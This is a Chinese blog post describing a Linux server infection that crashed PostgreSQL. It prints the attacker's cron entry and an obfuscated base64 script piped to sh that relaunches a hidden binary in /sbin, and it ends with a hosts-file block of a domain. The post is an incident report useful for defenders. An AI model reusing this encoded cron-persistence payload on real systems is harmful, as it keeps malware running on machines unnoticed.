ld-linux病毒入侵

最新推荐文章于 2023-09-13 14:17:34 发布
最新推荐文章于 2023-09-13 14:17:34 发布
阅读量570 收藏
点赞数
分类专栏: Linux_devops
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ha_123_qq/article/details/82732921
版权

今天postgresql 的服务挂了,查看进程:
这里写图片描述

查看定时任务

[root@localhost ~]# crontab -l
* * * * * /sbin/upd >/dev/null 2>&1

查看入侵脚本内容:

[root@localhost ~]# cat /sbin/upd
#!/usr/bin/env bash
echo 'IyEvYmluL3NoCmlmIHRlc3QgLXIgL3NiaW4vaW5pdGN0MTsgdGhlbgpwaWQ9JChjYXQgL3NiaW4v
aW5pdGN0MSkKaWYgJChraWxsIC1DSExEICRwaWQgPi9kZXYvbnVsbCAyPiYxKQp0aGVuCnNsZWVw
IDEKZWxzZQpjZCAvc2JpbgouL21rZTNmcyAmPi9kZXYvbnVsbApleGl0IDAKZmkKZmkK' | base64 -d | sh

原来长这样:

这里写图片描述

还有
在这里插入图片描述

暂时解决办法
vim /etc/hosts

123.123.123.123  www.tionhgjk.com

坐等硬件防火墙的到来。。。。

花仙子子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux 病毒 sfewfesfs
skiwnc的博客
11-14 278
linux 病毒 sfewfesfs
ld-linux.so.2命令,深入理解LINUX下动态库链接器/加载器ld-linux.so.2
weixin_42298332的博客
05-13 2474
ld-linux-x86-64.so.2】最近在Linux 环境下开发,搞了好几天 Compiler 和 linker,觉得有必要来写一篇关于Linux环境下 ld.so的文章了,google上搜索了很多相关介绍性的文档,发现国内百度上却很少有相关类文档,觉得有必要来梳理一下:ld-linux.so.2 是linux下的动态库加载器/链接器,这篇文章主要来讲一下 ld-linux.so.2 是如...
ida调试linux程序,[原创]IDA动态调试ELF
weixin_39758956的博客
05-01 421
0x00:环境待调试ELF文件IDA 7.0主机:Windows虚拟机:Linux达成效果:在Window上利用IDA远程动态调试linux里的ELF文件0x01:Unbuntu里运行IDA的服务器组件IDA附带以下组件:linux_server:在Linux计算机上执行的、用于调试32位Linux应用程序的服务器组件。linux_server64:在64位Linux计算机上执行的、用于调试64位...
Linux中安装IDA
y0un9er
07-21 5096
Linux中安装IDA,并利用shell脚本配置命令行启动
记一次真实liunx挖矿病毒处理
m0_63028223的博客
02-27 501
一次liunx挖矿木马应急处理
Linux上x86_64架构的动态链接器 ld-linux-x86-64.so.2
最新发布
青衫客36的博客
09-13 4324
Linux操作系统上x86_64架构的动态链接器(也称为动态链接编辑器)。它负责加载和链接在运行时(即程序启动时或之后)被引用的动态库。现在,我们来深入了解其作用和重要性:动态链接器的作用:优势:如何工作:查找共享库:ldd工具:总之,是Linux上的动态链接器,用于加载和链接动态库,进而可以运行各种程序。 文件在 Linux 系统中起到一个重要的作用:它缓存动态链接器查找共享库时所需的路径信息。以下是关于这个文件的详细介绍:目的:如何生成:查看内容:为什么是重要的:更新:总之, 是一个为系统上的动态链接
ld-linux-armhf.so.3
07-08
/system/bin/sh: XXX: No such file or directory
centos安装jdk1.8时出现没有/lib/ld-linux.so.2:这个文件的原因分析
01-10
-bash: /usr/local/jdk/jdk1.8.0_181/bin/java: /lib/ld-linux.so.2: bad ELF interpreter: No such file or directory 安装完后 java -version 查看版本出现: 原因是:没有那个文件或目录,找了很久发现需要...
ld-linux.so.2
05-31
"ld-linux.so.2" 是一个在Linux操作系统中至关重要的动态链接库,它属于GNU C库(glibc)的一部分。这个库的主要功能是加载并执行可执行程序中的动态链接依赖。在深入探讨之前,我们先来了解一下动态链接和静态链接的...
CentOS 安装软件出现错误:/lib/ld-linux.so.2: bad ELF interpreter 解决
01-11
CentOS 安装软件出现错误:/lib/ld-linux.so.2: bad ELF interpreter 解决 环境: [orangle@localhost Downloads]$ uname -m&&uname -r x86_64 2.6.32-220.el6.x86_64 [orangle@localhost Downloads]$ cat /etc/...
Linux / ldd 命令的介绍与使用
布袋和尚
08-09 1679
我们知道,ld-linux.so 模块会先于 executable 模块程序工作,并获得控制权,因此当上述的那些环境变量被设置时,ld-linux.so 选择了显示可执行模块的 dependency。当 LD_TRACE_LOADED_OBJECTS 环境变量不为空时,任何可执行程序在运行时,它都会只显示模块的dependency,而程序并不真正执行。(3)/etc/ld.so.cache 文件中的路径,但如果可执行程序在连接时候添加了 -z nodeflib 选项,则跳过。
ld-linux-aarch64.so.1 这个是什么文件
天涯路的专栏
05-16 3812
动态链接器是一个系统组件,负责在程序运行时加载共享库(shared library)并解析它们的符号引用,以便程序能够正常执行。程序在运行时会使用动态链接器来查找和加载共享库,并将程序的符号引用与共享库中的符号进行关联。当出现与动态链接器相关的错误时,如符号未定义或版本不匹配等,程序的正常执行可能会受到影响。是一个动态链接器(dynamic linker)的文件,用于ARM 64位架构上的Linux系统。这个文件是GNU C库(glibc)提供的动态链接器的实现之一,它位于系统的标准库路径(如。
Linux命令:ld
深度安全实验室
04-21 759
Linux命令:ld
linux中的ld命令及其搜索路径顺序
顺其自然~专栏
04-26 1121
ld(Link eDitor)命令是二进制工具集 GNU Binutils的一员,是GNU链接器,用于将目标文件与库链接为可执行文件或库文件。
ld-linux-x86-64.so.2挖矿木马,排查操作记录
Nikkis的博客
12-27 4259
排查并彻底清除ld-linux-x86-64.so.2挖矿木马
Linux 命令-ld 命令
顺其自然~专栏
04-26 3174
ld(Link eDitor)命令是二进制工具集GNU Binutils的一员,是GNU链接器,用于将目标文件与库链接为可执行文件或库文件。
嵌入式Linux系统开发笔记(十二)
SudekiMing的博客
01-31 1838
嵌入式Linux系统移植,BusyBox 根文件系统构建
linux ld so 源码分析,理解ld-linux.so.2
weixin_39878549的博客
05-12 1451
前言ld-linux.so.2是linux的动态加载器(dynamic loader)。本文试图就ld-linux.so.2如何与Linux交互,如何与正在调用的应用程序进行交互 给出一个概述。什么是ld-linux.so现在,大多数程序都是动态链接的。 当操作系统加载一个动态链接的应用程序时,它必须找到并加载它执行该应用程序所依赖的动态库。 在linux系统上,这份工作由ld-linux.so....
理解ld-linux.so.2
boyemachao的专栏
05-28 1537
ld-linux.so.2是linux的动态加载器(dynamic loader)。本文试图就ld-linux.so.2如何与Linux交互,如何与正在调用的应用程序进行交互 给出一个概述。 什么是ld-linux.so 现在,大多数程序都是动态链接的。 当操作系统加载一个动态链接的应用程序时,它必须找到并加载它执行该应用程序所依赖的动态库。 在linux系统上,这份工作由ld-linux.so.2处理。 你可以对一个应用程序 或 动态库使用ldd命令查看他依赖哪些库。 root@ubunt
如何设置arm-linux-gnueabihf-gcc优先使用ld-linux.so.3而不是 ld-linux-armhf.so.3
06-10
您可以通过以下方式设置 arm-linux-gnueabihf-gcc 优先使用 ld-linux.so.3: 1. 打开文件 /usr/arm-linux-gnueabihf/lib/crti.o,使用以下命令打开文件: ``` sudo nano /usr/arm-linux-gnueabihf/lib/crti.o ``` 2. 在打开的文件中查找 ld-linux-armhf.so.3,并将其替换为 ld-linux.so.3。 3. 保存文件并退出。 现在,arm-linux-gnueabihf-gcc 将优先使用 ld-linux.so.3 而不是 ld-linux-armhf.so.3。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值